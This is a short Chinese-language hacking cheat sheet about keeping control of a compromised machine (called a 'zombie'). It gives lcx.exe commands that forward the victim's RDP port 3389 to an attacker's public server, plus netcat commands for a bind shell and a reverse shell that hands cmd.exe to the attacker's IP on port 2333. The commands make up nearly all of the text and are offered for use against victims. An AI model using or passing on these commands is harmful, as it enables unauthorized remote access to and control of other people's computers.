一、lcx的使用

1.肉鸡上执行：lcx.exe –slave 公网ip +端口 肉鸡ip +端口

例如：lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389

意思是把肉鸡的3389端口转发到xxx.xxx.xxx.xxx公网的10000端口

2.公网ip机器上执行 Lcx.exe –listen 10000 10001

例如：Lcx.exe –listen 10001 10000

意思是监听公网ip机器上的10001端口请求，并将10001的请求传送给10000端口。

此时，RDP连接，只需要输入 127.0.0.1:10000，即可远程连接到肉鸡上。

二、nc反弹cmdshell

1.开启肉鸡代理执行cmdshell

在肉鸡上执行 nc -l -p 2333 -t -e cmd.exe

意思是，肉鸡监听本地的2333端口，且应答通过telnet（-t）模式执行cmd.exe程序

在自己的公网服务器上执行 nc -nvv 肉鸡ip 2333

2.反向代理执行cmdshell

在公网服务器上运行nc -l -p 2333

意思是监听本地端口2333，登台其他电脑登陆过来

在肉鸡上执行 nc -t -e cmd.exe 公网服务器ip 2333

意思是让肉鸡可以通过telnet模式执行cmd.exe程序，并可以把执行权通过2333端口给公网服务器